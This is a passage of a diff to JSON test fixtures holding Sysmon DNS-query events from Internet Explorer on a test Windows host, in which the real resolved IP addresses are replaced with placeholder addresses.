ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2445,7 +2445,7 @@
 "computer_name": "vagrant-2016",
 "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
 "event_data": {
- "QueryResults": "::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.222",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2461,7 +2461,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2490,7 +2490,7 @@ "ProcessId": "2736", "QueryName": "c1.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;", + "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -2504,7 +2504,7 @@ "event_data": { "QueryName": "urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2532,7 +2532,7 @@ "event": { "provider": "Microsoft-Windows-Sysmon", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event" }, "log": { @@ -2564,7 +2564,7 @@ "ProcessId": "2736", "QueryName": "dsum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.290" }, 
@@ -2575,7 +2575,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2584,7 +2584,7 @@ { "@timestamp": "2021-05-05T15:30:51.699Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2600,7 +2600,7 @@ "ProcessId": "2736", "QueryName": "ocsp.godaddy.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;" + "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;" }, "computer_name": "vagrant-2016", "version": 5, 
@@ -2759,7 +2759,7 @@ "ProcessId": "2736", "QueryName": "ocsp.usertrust.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -2780,7 +2780,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2794,7 +2794,7 @@ "version": 5, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;", + "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.343", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2822,7 +2822,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
